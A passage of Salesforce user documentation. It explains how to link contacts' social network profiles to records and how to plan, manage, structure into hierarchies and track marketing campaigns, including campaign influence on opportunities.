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Supported ObjectsWhat you see in SalesforceSocial
Network

AccountsKlout™ is a third-party service that analyzes people's influence across social
networks, including Twitter, Facebook, and LinkedIn. Use Klout to see

Klout

Contacts
your accounts', contacts', and leads' influence on social media, who they
influence, who influences them, and the topics they talk about. Leads

ContactsLinkedIn® is useful for staying up to date on your contacts', leads', and person
accounts' professional personas. You can see profile photos, current titles
and companies, and locations.

LinkedIn

Leads

Person Accounts (does not
include Social Key)

Accounts (does not include Social
Key)

Twitter™ is a great way to see the public personas of your existing and
potential customers and learn what's on their minds. You can see bios, recent

Twitter

tweets, and the people who are following and being followed by your
accounts, contacts, and leads.

Contacts

Leads

AccountsYouTube™ helps you find and view videos related to your accounts, contacts,
and leads.

YouTube

Contacts

Leads

Additional social networks may be available in future updates.

Important:  The Social Accounts and Contacts feature uses Facebook, Klout, LinkedIn, Twitter, and YouTube public
APIs to display social information in Salesforce. Because these social networks have the option of modifying or
terminating access to their APIs at any time, salesforce.com can’t guarantee the future availability of this feature or
any of its functionality, including access to the data that is currently provided or to any particular social network as a
whole.

To get started with Social Accounts and Contacts, simply sign in to your social network accounts from any account, contact,
or lead detail page. This creates private connections between Salesforce and your social network accounts, allowing you to see
external social profiles in Salesforce.

Then you’re ready to take your customer insights to the next level by linking your accounts’, contacts’, and leads’ social profiles
to their Salesforce records. Once you link a profile to a record, that social data is available to you and everyone else in your
organization, without having to log in to other sites. The details that each Salesforce user can see depends on their connection
level with the account, contact, or lead, as well as the privacy settings for the profile. Regardless of how much detail is visible,
the information that Salesforce displays is always current.

Click the social network icons in the header on account, contact, and lead detail pages to display the Social Accounts and
Contacts viewer. If no icons are visible, Social Accounts and Contacts is disabled for your organization. If a social network
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icon is missing, that service may be turned off. Contact your administrator if you'd like to use this feature or want access to a
social network that isn't currently available.

See Also:
Security and Privacy When Using Social Accounts and Contacts
Data.com Social Key Overview—Beta

Security and Privacy When Using Social Accounts and Contacts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

Social Accounts and Contacts is secure and private. Here's an overview of its security and privacy features:

• Salesforce uses the trusted OAuth protocol when you sign in to your Facebook, LinkedIn, or Twitter accounts, so your
login credentials aren't exposed to Salesforce.

• Salesforce doesn't import or store social information. Each time you select a contact's social profile or YouTube video,
Salesforce retrieves the information directly from the corresponding social network and simply displays it. The information
that you see is read-only and can't be modified.

• You can't import or store social data in Salesforce records. This ensures that you always see current details when viewing
your accounts', contacts', and leads' social information.

• The details that are visible to you when you view a Facebook, LinkedIn, or Twitter profile are determined by the connection
that you have with the account, contact, or lead, as well as privacy settings. Typically you see the same information as you
would when viewing the profile while logged in directly to the social network. Some of your customers, however, may have
privacy settings that restrict the visibility of some or all of their profile details outside the network. In those cases, you see
very few, if any, profile details in Salesforce.

• Your view of a Facebook, LinkedIn, or Twitter profile is not shared with anyone else in your organization. Other Salesforce
users must sign in to their own social network accounts to use Social Accounts and Contacts and the profile details that
are visible depend on each user's connection level with the account, contact, or lead, as well as their privacy settings.

• None of your Facebook, LinkedIn, or Twitter profile information is stored in Salesforce, nor does Salesforce post anything
about you or your activities to your social network accounts.

• Accounts, contacts, and leads aren't notified when you view their social network profiles using the Social Accounts and
Contacts feature.

Important:  The Social Accounts and Contacts feature uses Facebook, Klout, LinkedIn, Twitter, and YouTube public
APIs to display social information in Salesforce. Because these social networks have the option of modifying or
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terminating access to their APIs at any time, salesforce.com can’t guarantee the future availability of this feature or
any of its functionality, including access to the data that is currently provided or to any particular social network as a
whole.

See Also:
Social Accounts, Contacts, and Leads Overview
Using Social Accounts

Using Social Contacts
Available in: All Editions except Database.com

When using Social Accounts and Contacts for contacts, you can:

• Configure your Social Accounts and Contacts settings so the Social Accounts and Contacts viewer only shows the social
networks that you want to use.

• Sign in to your social network accounts from any contact detail page.

• Find your customers’ Facebook, LinkedIn, and Twitter profiles and link them to their contact records, so you can view
this information from contact detail pages.

• Find YouTube videos related to your contacts and play them from contact detail pages.

• See your contacts’ Klout information from contact detail pages.

• Modify default search criteria if you’re having trouble locating a contact’s social information.

• If your organization uses Data.com Social Key (beta in Summer ‘13) , get contacts’ social profiles automatically.

See Also:
Social Accounts, Contacts, and Leads Overview
Security and Privacy When Using Social Accounts and Contacts
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Signing in to Your Social Network Accounts from Contact
Detail Pages

Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo sign in to your social network accounts from contact detail
pages:

To get started using Social Accounts and Contacts, you first need to sign in to your social network accounts from any account,
contact, or lead detail page. This creates private connections between Salesforce and your social network accounts, allowing
you to see external social profiles in Salesforce. These connections persist in future Salesforce sessions so you don't have to
sign in to your social network accounts again unless you sign out in the Social Accounts and Contacts viewer.

Note:  You can see YouTube videos without doing these steps. The Klout service is only available when you’re signed
in to your Twitter account..

1. Open the contact’s detail page.

2. Click a social network icon ( ).
3. Click Sign in button on the Social Accounts and Contacts viewer.
4. Enter your social network account credentials and authorize Salesforce to access your account.

Your Salesforce account and social network account are now connected.

5. If you want to log in to another social network, just click its tab on the viewer.

Note: Salesforce users who are not within either the Salesforce.com or Force.com domains, such as Cloud.com users,
cannot Log into Facebook from within Salesforce.

See Also:
Using Social Contacts
Social Accounts, Contacts, and Leads Overview
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Viewing and Associating Your Contacts' Social Network
Profiles

Available in: All Editions except Database.com

User Permissions Needed

“Edit” on contactsTo find and link social network profiles to contact records:

“Read” on contactsTo view a contact's social network profiles:

View your contacts’ social network profiles right from a record’s detail page. It’s easy. Social Accounts and Contacts lets you
find your customers’ LinkedIn, Twitter, and Facebook profiles (if available) and associate them with your contact records,
then view them directly from contact detail pages. Other users who can view the contact record can also view the profile. If
your organization uses Data.com Social Key (Beta in Summer ’13), we provide the links automatically (if available) for LinkedIn,
Twitter, and Facebook.

Note:  Depending on contacts’s and leads’ privacy settings, as well as the permissions set by their friends or connections
and the site’s terms of use, users may not see as much information as they would if logged directly into their social
network accounts.

1. From the contact’s detail page, click the icon for the social network where you want to view your contact’s profile

( ) to open the Social Accounts and Contacts viewer.
2. If you need to, from the Social Accounts and Contacts viewer, sign in to that social network.
3. If you haven’t yet associated a profile for the contact, select the one you want from those we show you. Viewing a profile

automatically associates it with the contact. If you use Social Key, your record may have a profile already associated.
4. If you need to associate a different profile, click Find Different Profile.
5. If you want to view the contact’s profiles on other social networks, just click their tabs in the viewer.
6. You can also:

• Click Show Photo in Salesforce to display the contact's profile picture on the contact detail page. When Social Key
finds a LinkedIn handle for a contact, it automatically displays that image on the contact’s detail page. You can choose
a different photo (including photos from Twitter or Facebook) if you wish.

• Click View Full Profile to see the contact's complete social network profile directly in the social network.
• Click Sign Out to close the private connection between Salesforce and your social network account. When you do this,

you're unable to see your contacts' social network profiles until you sign in again.

See Also:
Using Social Contacts
Social Accounts, Contacts, and Leads Overview
Data.com Social Key Overview—Beta
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Viewing YouTube Videos about Your Contacts
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo find and view YouTube videos related to contacts:

You can use Social Accounts and Contacts to find YouTube videos related to your contacts and play them from contact detail
pages in Salesforce.

1. Open the contact record.
2. In the header on the detail page, click the YouTube icon ( ).
3. In the YouTube search results, click the video that you want to watch.

Tip:  If the default search doesn't find videos for the correct person, search again using different search terms.

4. The YouTube player opens in the Social Accounts and Contacts viewer and the video begins playing.

See Also:
Using Social Contacts
Social Accounts, Contacts, and Leads Overview

Viewing Your Contacts' Klout Information
Available in: All Editions except Database.com

User Permissions Needed

“Read” on contactsTo view a contact's Klout information:

You can use Social Accounts and Contacts to see your contacts’ Klout information, directly from contact detail pages in
Salesforce.

Note:

The Klout service is dependent on Twitter—an administrator must enable Twitter in your organization’s Social
Accounts and Contacts settings and you must be signed in to your Twitter account. You don’t need a Klout account,
or have to be signed in to your Klout account, to see Klout information in Salesforce.

Before Klout information is available for a contact, you or someone else in your organization needs to associate a
Twitter profile with the contact record.
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To see Klout information for a contact:

1. Open the contact record.
2. In the header on the detail page, click the Klout icon ( ).
3. View the contact’s Klout information.

See Also:
Using Social Contacts
Social Accounts, Contacts, and Leads Overview

Tips for Finding Your Contacts' Social Information
Available in: All Editions except Database.com

When you want to associate a social network profile with a contact—either for the first time or if you’re switching to a different
profile using the Find Different Profile button—the Social Accounts and Contacts feature searches for profiles that match
the Name field on the contact record. If you're looking for a LinkedIn profile, the search also matches against the Account
Name field.

Similarly, when looking for YouTube videos that are related to a contact, the default search criteria is determined by the Name
field.

Here are some tips for finding a contact’s social information.

• If the default search can't locate your contact's social network profile or YouTube videos related to the account, enter
different keywords in the search box on the Social Accounts and Contacts viewer and click Search.

• The name on the contact record may be different from your contact’s social network user name or the name used in YouTube
video keyword tags. Try different variations of the contact's name; for example, search for Maddie Rigsby instead of
Madison Rigsby.

• For LinkedIn profile searches, the account name on the contact record may not exactly match the company name in the
contact's LinkedIn profile. Try different versions of the account name, such as Universal Paper or Universal
Paper, Incorporated instead of Universal Paper, Inc.

• If your organization uses Data.com Social Key (Beta in Summer ’13), we’ll automatically find and associate your contacts’
social handles (if available) from LinkedIn, Twitter, and Facebook, so you can view profile and feed information without
having to make associations. If we find more than one potential match for your contact, we’ll let you choose the one you
want.

If you still can't find the correct profile, the contact may not have an account in the social network or the contact's privacy
settings may be blocking you from finding their profile in a search. If your YouTube searches are still unsuccessful, the contact
may not be featured in any videos shared on YouTube.

See Also:
Using Social Contacts
Social Accounts, Contacts, and Leads Overview
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Defining Your Social Accounts and Contacts User Settings

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions
Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

If the Social Accounts and Contacts feature is enabled for your organization, you can customize it so it works the way you
want it to. You can also turn the feature off if you don’t want to use it.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Social Accounts and Contacts > Settings.
• If you clicked My Settings, select Display & Layout > My Social Accounts and Contacts.

3. Set up Social Accounts and Contacts so it works the way you want it to.
4. Click Save.

See Also:
Social Accounts, Contacts, and Leads Overview
Security and Privacy When Using Social Accounts and Contacts
Social Accounts, Contacts, and Leads Overview
Tips for Finding Your Contacts' Social Information
Using Social Leads
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CAMPAIGNING AND GENERATING LEADS

PLANNING, MANAGING, AND TRACKING CAMPAIGNS

Campaigns Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A campaign is an outbound marketing project that you want to plan, manage, and track within Salesforce. It can be a direct
mail program, seminar, print advertisement, email, or other type of marketing initiative. You can organize campaigns into
hierarchies for easy analysis of related marketing tactics.

The Campaigns tab displays a home page that lets you quickly locate and report on campaigns. You can also sort and filter
campaigns using standard and custom list views. In addition, this tab lets you view and edit detailed information on campaigns.

Note:  To manage campaigns, users must have the Marketing User checkbox selected on their personal information
page, the appropriate user permissions, and sharing access to the campaign. Other users can only view campaigns and
run campaign reports. See Who has access to campaigns? on page 971.

In addition, campaigns cannot be disabled for your organization if campaigns are referenced in Apex.

See Also:
Campaigns Home
Tip sheet: Five Steps for Managing Campaigns
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Campaigns Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view Campaigns tab:

“Read” on campaignsTo view campaigns:

“Create” on campaignsTo create campaigns:

Clicking on the Campaigns tab displays the campaigns home page. Any user can access the campaigns home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Campaigns section, select an item from the drop-down list to display a brief list of the top campaigns
matching that criteria. From the list, you can click any campaign name to go directly to the campaign detail. Toggle the
Show 25 items and Show 10 items links to change the number of items that display. The fields you see are determined by
the “Campaigns Tab” search layout defined by your administrator and by your field-level security settings (available in
Enterprise, Unlimited, and Developer Editions only). The Recent Campaigns choices are:

DescriptionRecent Campaigns Choice

The last ten or twenty-five campaigns you viewed, with the
most recently viewed campaign listed first. This list is derived

Recently Viewed

from your recent items and includes records owned by you
and other users.

The most recent ten or twenty-five campaigns marked as
Active, with the most recently created campaign listed first.
This list only includes records owned by you.

My Active Campaigns

• In the Recent Campaigns section, click New to create a new campaign.

• Under Reports, click any report name to jump to that report.

See Also:
Campaigns Overview
Managing Campaigns
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Managing Campaigns
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Create” on campaigns

AND

Marketing User checked in your user information

To create campaigns:

“Edit” on campaigns

AND

Marketing User checked in your user information

To change campaigns:

“Edit” on campaigns

AND

Marketing User checked in your user information

AND

“Import Leads”

To use the lead import wizard:

“Edit” on campaigns

AND

Marketing User checked in your user information

AND

“Import Leads”

AND

“Read” on contacts

To use the campaign update wizard:

Managing campaigns in Salesforce involves the five major steps listed below. We recommend you follow these steps to make
your marketing programs and post-campaign analysis more effective.

See the Campaign Management Implementation Guide for additional information.

1. Create the campaign

After determining your marketing strategy, create a campaign to track your efforts. See Creating Campaigns on page 956.

2. Create your target list
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Next define who you want to target with your campaign. The method used to create a target list depends on who you are
targeting:

• Rented or Purchased Lists - Simply use the list of names as your target list. We recommend that you do not import
the names into the system yet.

• Existing Contacts, Leads, or Person Account - Run a contact, lead, or person account report in Salesforce and use
the Add to Campaign button to associate those records with your campaign. Alternatively, go to a list view of contacts
or leads and use the Add to Campaign button to associate those records with your campaign. Note that person accounts
are included in contact list views and can be added to campaigns from them. See Managing Campaign Members on
page 937.

3. Execute the campaign

All campaign execution occurs outside of Salesforce. It can be online or offline, for example:

• Online - Send email using an email execution vendor.
• Offline - Plan and host a conference; run print or radio advertisements; send direct mail pieces; or host a Web seminar.

4. Track responses

The possible types of campaign responses can be divided into the following groups based on the response tracking mechanism:

• Website Response - Prospects respond by filling in a form on your website. Use Web-to-Lead to set up a jump page
or microsite for the campaign. All responses are created as leads, and if the Web form includes the Campaign field
value, the leads are directly associated to the campaign. You can also include the Member Status field in the form
to automatically mark all submissions with a particular member status.

• Manual Update - Customers and prospects respond via phone or mail. A sales or marketing team member can manually
update the Campaign History for the lead, contact, or person account. See Adding, Editing, or Cloning Individual
Campaign Members on page 950.

• Mass Update/Offline Response - The third type of response is any response that you track in an offline list, for
example, trade show attendance or email responses from your email vendor. In Salesforce, use the Manage Members
page to update the member status of leads, contacts, or person accounts that have been associated with your campaign.
See Editing Multiple Campaign Members on page 939. Alternatively, import the offline list into Salesforce via the
Campaign Import Wizards. See Importing Campaign Members on page 952.

5. Analyze campaign effectiveness

The final step is to analyze the effectiveness of the campaign using reports and campaign statistics. See Displaying and
Editing Campaigns on page 929 for information on calculating statistics.

See Also:
Campaigns FAQ
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Viewing Campaign Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaign lists:

“Create” on campaigns

AND

Marketing User checked in your user information

To create, edit, or delete campaigns:

The campaigns list page displays a list of campaigns in your current view. To show a filtered list of items, select a predefined
list from the View drop-down list, or click Create New View to define your own custom views. To edit or delete any view
you created, select it from the View drop-down list and click Edit.

• Click a campaign name to view the detail. Click Edit or Del to edit or delete the campaign.

• Click New Campaign or select Campaign from the Create New drop-down list in the sidebar to create a campaign.

See Also:
Campaigns Overview

Viewing Campaign Hierarchies
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

A campaign hierarchy allows you to group campaigns together within a specific marketing program or initiative, which enables
you to analyze related marketing efforts more efficiently.

To view the hierarchy for a campaign, click View Hierarchy next to the Campaign Name field on the campaign detail page.
If a campaign is not part of a hierarchy, its corresponding Campaign Hierarchy page shows only the campaign you selected.

A campaign hierarchy shows campaigns that are associated with one another via the Parent Campaign field. A hierarchy
illustrates a relationship between campaigns, such as a grouping of campaigns within a specific marketing tactic. Each campaign
can have only one parent campaign but an unlimited number of sibling campaigns, and a campaign hierarchy can contain a
maximum of five levels or generations. In other words, a campaign hierarchy has a maximum depth of five levels but an
unlimited breadth on each level. Campaign members, such as contacts and leads, can be included on any level.
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On the Campaign Hierarchy page, campaigns are indented to show that they are related to the campaigns above them.
Campaigns are listed in descending order based on their hierarchy level. Click any campaign name to open the detail page for
that campaign.

Statistics for an individual campaign are in the Campaign Statistics section of the campaign detail page. Aggregate statistics
for parent and child campaigns are in the Campaign Hierarchy related list.

Note:  To ensure accurate reporting, all campaigns in a hierarchy must use the same currency.

See Also:
Setting Up Campaign Hierarchies
Viewing Campaign Hierarchy Statistics

Viewing Campaign Hierarchy Statistics

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Read” on campaignsTo view campaign hierarchies:

Campaign detail pages include a Campaign Hierarchy related list, which displays a parent campaign and all the campaigns
directly below the parent campaign in the campaign hierarchy. You can create a campaign hierarchy by associating campaigns
with one another using the Parent Campaign lookup field on the campaign detail page. Click any campaign in the related
list to open the detail page for that campaign.

The Campaign Hierarchy related list provides statistics fields for each campaign in the list as well as the total value for the
parent campaign and all the campaigns below it in the campaign hierarchy. Statistics fields are not visible in the related list
until campaign hierarchies are enabled for your organization. For more information and a list of fields, see Setting Up Campaign
Hierarchies on page 932.

The Campaign Hierarchy related list shows a maximum of two hierarchy levels: the parent campaign and its child campaigns.
If a child campaign has children, those children do not appear in the related list but their data is included in the campaign
hierarchy statistic field values. The campaign hierarchy statistic fields provide aggregate data regardless of whether you have
sharing rights to view individual campaigns within the hierarchy. However, if you do not have access to a campaign that appears
in the related list, you cannot view its detail page from the link on the related list. To view all the levels in a campaign hierarchy,
click the View Hierarchy link next to the Campaign Name on the campaign detail page.

See Also:
Displaying and Editing Campaigns
Campaign Fields
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Displaying and Editing Campaigns
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaign lists:

“Edit” on campaigns

AND

Marketing User checked in your user information

To change campaigns:

Displaying Campaigns

Once you have located a campaign on the campaigns home or list pages, click the campaign name to display detailed
information. You can also select a campaign name from the Campaign History related list of an associated lead, contact,
or person account. If hover details are enabled, hover over any lookup field on the detail page to view key information
about a record before clicking into that record’s detail page.

Editing Campaigns

To update a campaign, click Edit, and then change the fields you want to update. When you have finished, click Save.
You can also click Save & New to save the current campaign and create another.

Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

Note:  To edit a campaign that is a child of another campaign, you must have at least “Read” access on the
parent.

Creating Campaign Hierarchies

When creating or editing a campaign you can use the Parent Campaign lookup field to assign a parent to your
campaign. In the lookup dialog you can search for an existing campaign or create a new parent campaign. For more
information on configuring campaign hierarchies for your organization, see Setting Up Campaign Hierarchies on page
932.

Calculating Campaign Statistics

The campaign detail includes campaign statistic fields, which are updated automatically and include values from all
associated records regardless of whether you have read access to those records. If you have campaign hierarchies enabled,
the Campaign Hierarchy related list contains aggregate statistics for a parent campaign and all the campaigns below it
in the campaign hierarchy.

Note:  The campaign statistics calculation process runs every two minutes and processes one campaign's statistics
at a time. If there are a large number of campaigns or campaigns with large numbers of campaign members
pending, there may be a delay of 10 minutes or more.

929

Displaying and Editing CampaignsPlanning, Managing, and Tracking Campaigns



Linking Contacts, Leads, or Person Account to Campaigns

Select one of the following options from the Manage Members drop-down button on the campaign detail page:
• Add Members - Search to add campaign members from a search.

• Add Members - Import File to add campaign members by importing leads from a comma-delimited text file (.csv).

• Edit Members - Search to view, update, or delete existing campaign members.

• Update & Add Members - Import File to edit campaign member status using an import file.

Advanced Setup

Click Advanced Setup to customize the Member Status values for a campaign. The Member Status values are the
possible responses that a member can have to the campaign, for example, “Sent,” “Responded,” “Attended.” See
Customizing Campaign Setup on page 931.

Campaign Related Lists

• Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter is
enabled, hover links display below the feed. An interactive overlay allows you to quickly view and manage the related
list items. Click a hover link to jump to the content of the related list. If hover links are not enabled, contact your
Salesforce administrator.

• The lower portion of the display provides information related to the campaign including activities, attachments,
campaign members, campaign hierarchies, and the opportunities that resulted from the campaign. The related lists
you see are determined by your personal customization, and by any customization your administrator has made to
page layouts or your permissions to view related data. You can click individual items to display additional detail.
Click More at the bottom of the page or View More below a related list to display more items.

Printing Campaigns

To view a printable display of all information for the campaign, click Printable View on the campaign detail page. Use
your browser’s Print function to print the display.

Sharing

To share a campaign with other users, groups, or roles, click Sharing. See Sharing Campaigns on page 964.

To return to the last list page you viewed, click Back to list at the top of the campaign detail page. If your organization has
enabled collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the
detail page.

See Also:
Searching for Campaigns
Managing Campaigns
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Customizing Campaign Setup
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Edit” on campaigns

AND

Marketing User checked in your user information

To edit member status values:

For each campaign, Marketing Users must define campaign Member Status values. These are the statuses that a lead,
contact, or person account may have for a campaign. For example, you might define values of “Planned,” “Sent Invitation,”
“RSVP,” and “Attended” for a conference. If you want to copy the Member Status values from an existing campaign, you
can begin by cloning that campaign.

User Privileges for Customizing Campaign Setup

• Anyone can view a campaign's advanced setup. You can edit advanced setup if:

◊ The Marketing User checkbox is selected in your user information
◊ You have the “Edit” permission on campaigns
◊ You have at least read/write sharing access on the campaign record

• If you replace member status values, all campaign records are updated regardless of your sharing access to the related
contacts or leads.

Defining Member Status Values

New campaigns have two default member status values: “Sent” and “Responded”. You can edit them or create new ones.

1. Click Advanced Setup on a campaign detail page.
2. Click Edit.
3. Update the existing entries or add new values.
4. Click Add More as needed to add additional entries. You can add up to 50 entries.
5. Select one entry as the “Default” value.
6. Choose which values will be counted as “Responded.” Members with “Responded” values are tallied in the Total

Responses field on the campaign.

Note:  Modifying the Responded checkbox has broad effects. When you select or deselect the Responded checkbox,
campaign statistics and campaign member details change accordingly. Specifically, the fields Responded, Last
Responded Date, and Last Modified change on the campaign member record. For example, if you're working
with a status called “Attended” and you select the Responded checkbox for it, existing campaign members whose
status is “Attended” will then be counted as responses in campaign statistics and the aforementioned date fields
will update.
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Replacing Member Status Values

You can globally replace the Member Status values for each campaign member. For example, you may decide that “Attended”
is a more appropriate value than “Showed Up.”

1. Click Advanced Setup on a campaign detail page.
2. Click Replace in the Member Status Values related list.
3. Enter the value you want to change, and select the new value.
4. Click Save.

Note:  Replacing the campaign member status doesn't recalculate roll-up summary fields or fire workflow, triggers,
or validation rules.

See Also:
Managing Campaign Members

Setting Up Campaign Hierarchies
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on campaigns

AND

Marketing User enabled in your user detail page

To create a campaign hierarchy:

“Customize Application”To set up campaign hierarchies:

Campaign hierarchies provide a powerful categorization tool that enables you to analyze and report on the health of your
related campaigns. By associating campaigns with one another using a lookup relationship, you can group campaigns within
a specific marketing program or initiative. A hierarchy can contain a maximum of five levels. Each campaign can have only
one parent campaign but an unlimited number of sibling campaigns. By default, the Campaign Hierarchy related list appears
on the campaign detail page but does not contain records until campaign hierarchies are configured for your organization.

To set up campaign hierarchies, add the Parent Campaign field to your campaign page layout and enable the campaign
hierarchy statistics fields.

Note:  Depending on your user profile, the campaign hierarchy statistics fields may already be visible.

The campaign hierarchy fields include:

• Total Num Sent in Hierarchy

• Total Expected Revenue in Hierarchy

• Total Budgeted Cost in Hierarchy
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• Total Actual Cost in Hierarchy

• Total Leads in Hierarchy

• Total Converted Leads in Hierarchy

• Total Contacts in Hierarchy

• Total Opportunities in Hierarchy

• Total Won Opportunities in Hierarchy

• Total Value Won Opportunities in Hierarchy

• Total Value Opportunities in Hierarchy

• Total Responses in Hierarchy

See Campaign Fields on page 958 for a description of each field.

The process for making the fields visible depends on your Salesforce edition. For Enterprise, Unlimited and Developer editions,
use field-level security. As you make each field visible, Salesforce displays the field's value in the Hierarchy Total section of
the Campaign Hierarchy related list. For Professional Edition, add the campaign hierarchy statistic fields to the campaign
page layout; the fields will appear on the page layout and in the Hierarchy Total section of the Campaign Hierarchy related
list.

Note:  The campaign hierarchy fields provide aggregate data for a parent campaign and all the campaigns below it
in the campaign hierarchy, regardless of whether a user has sharing rights to a particular campaign within the campaign
hierarchy. Therefore, consider your organization's campaign sharing settings when enabling campaign hierarchy fields.
If you do not want users to see aggregate hierarchy data that includes campaigns to which the users do not have access,
you can choose to remove any or all of the campaign hierarchy fields from the Campaign Hierarchy related list. If
you do not add the campaign hierarchy fields to the related list or page layout, you can still access these fields on
reports.

Once campaign hierarchies are set up, users can create and assign parent campaigns using Parent Campaign and then view
details about the hierarchy on the Campaign Hierarchy page or the Campaign Hierarchy related list.

Note:  All campaigns within a hierarchy must use the same currency.

The Campaign Hierarchy page, accessible from the [view hierarchy] link next to the Campaign Name on the campaign
record, shows all the levels in a hierarchy and the campaigns included in each level. For more information, see Viewing
Campaign Hierarchies on page 927. The Campaign Hierarchy related list provides aggregate data for the parent campaign
and all the campaigns below it in the hierarchy. For more information see Viewing Campaign Hierarchy Statistics on page
928.

See Also:
Customizing Campaign Setup
Campaign Fields
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Associating Influential Campaigns to Opportunities

What is Campaign Influence?

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize application”To set up campaign influence:

“Read” on campaigns

AND

“Read” on opportunities

To view the campaign influence related list:

“Read” on campaigns

AND

“Edit” on opportunities

To manually add influential campaigns:

Because opportunities are usually influenced by more than one campaign, the campaign influence feature allows you to manually
or automatically associate multiple influential campaigns to a single opportunity. You can view influential campaigns from the
Campaign Influence related list on the opportunity detail page. The Primary Campaign Source field on an opportunity
detail page allows you to designate the most influential campaign for that opportunity.

If enabled, automatic association will add influential campaigns to opportunities when the campaign is related to a contact
that is assigned a contact role on the opportunity prior to the opportunity close date. You can specify additional automatic
association criteria, including a campaign influence time frame that limits the amount of time a campaign can influence a new
opportunity after the campaign first associated date and before the opportunity created date. Influential campaigns can also
be added to opportunities manually by clicking the Add Campaign button in the Campaign Influence related list.

Use the Campaigns with Influenced Opportunities campaign report to view opportunities that have been influenced by multiple
campaigns.

Before using the campaign influence feature, you must complete the following:

1. Add the Campaign Influence related list to the opportunities page layout in Setup by clicking Customize > Opportunities
> Page Layouts.

Note:  The Campaign Influence related list is already added to the opportunities page layout for customers who
signed up for a new Salesforce organization after the launch of the Winter '09 release, which occurred in October
2008.
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2. Set up campaign influence.

See Also:
Campaign Fields

Configuring Campaign Influence

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize application”To set up campaign influence:

Setting up Campaign Influence

You can configure influential campaigns to be automatically added to opportunities. When automatic association is enabled,
influential campaigns are added to opportunities when a campaign is related to a contact that is assigned a contact role on an
opportunity prior to the close date of the opportunity. For example, if you have an email campaign with a member who is
assigned a contact role on an open opportunity, the email campaign will be added to the Campaign Influence related list for
that opportunity.

You can set a Campaign Influence Time Frame that specifies the maximum number of days between the campaign first
associated date and the opportunity created date, during which a campaign is considered influential. For example, if you specify
a Campaign Influence Time Frame of 15 days and one of your contacts becomes a member of a campaign on June 1, the
campaign is considered influential to any opportunity that is created and associated with the contact by June 15. Use the
association rules to configure additional criteria that campaigns must meet to be automatically associated to an opportunity.

When automatic association is disabled, users must manually add influential campaigns to opportunities using the Campaign
Influence related list.

To set up automatic association for campaign influence:

1. From Setup, click Customize > Campaigns > Campaign Influence.
2. Select Enabled.
3. In the Campaign Influence Time Frame field, optionally specify the maximum number of days between the campaign

first associated date and the opportunity created date.

Note:  Campaigns associated to a contact prior to this time frame will not be considered influential. The maximum
campaign influence time frame is 9,999 days. If you do not want to specify a campaign influence time frame, leave
the Campaign Influence Time Frame field blank.

4. Optionally, define additional filter criteria that must be met in order for a campaign to be automatically associated.
5. Click Save.

Campaigns will be automatically added to the Campaign Influence related list on opportunities when they meet the criteria
you specified.

To disable automatic association for campaign influence:

1. From Setup, click Customize > Campaigns > Campaign Influence.
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2. Select Disabled.
3. Click Save.

See Also:
What is Campaign Influence?
Campaign Fields

Using the Campaign Influence Related List

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaigns

AND

“Read” on opportunities

To view the campaign influence related list:

“Read” on campaigns

AND

“Read” and “Edit” on opportunities

To manually add influential campaigns:

Adding, Editing, and Deleting Influential Campaigns

The Campaign Influence related list on an opportunity detail page provides information about campaigns that have influenced
the opportunity. From the Campaign Influence related list, you can add, edit, and delete influential campaigns.

Consider the following information before adding, editing, or deleting influential campaigns:

• Though multiple campaigns can be influential, you can only designate one campaign as the primary campaign source on
the opportunity.

• The campaign you manually designate as the primary campaign source will always display in the Campaign Influence
related list.

• The opportunities fields of the campaign statistics section on a campaign detail page will only be populated for the campaign
designated as the primary campaign source. For example, if you have an email campaign and a telemarketing campaign
that both influenced the same opportunity, and you designated the email campaign as the primary campaign source, the
campaign statistics opportunities fields will only be populated for the email campaign.

• When you select the Primary Campaign Source checkbox, the Primary Campaign Source field on the opportunity
detail page is updated with the name of the primary campaign. It is possible that workflow and Apex rules on opportunities
can be triggered by this change.

To add influential campaigns from the Campaign Influence related list:

1. View the detail page of an opportunity.
2. Click Add Campaign in the Campaign Influence related list.

3. Enter a campaign name in the Campaign name field or click the  icon to search for a campaign.
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4. Optionally select the Primary Campaign Source checkbox to designate the campaign as the primary campaign.
5. Click Save.

You can also configure filter criteria that, when met, will automatically add influential campaigns to opportunities. For example,
you can configure a filter to add only email and telemarketing campaigns.

To edit influential campaigns:

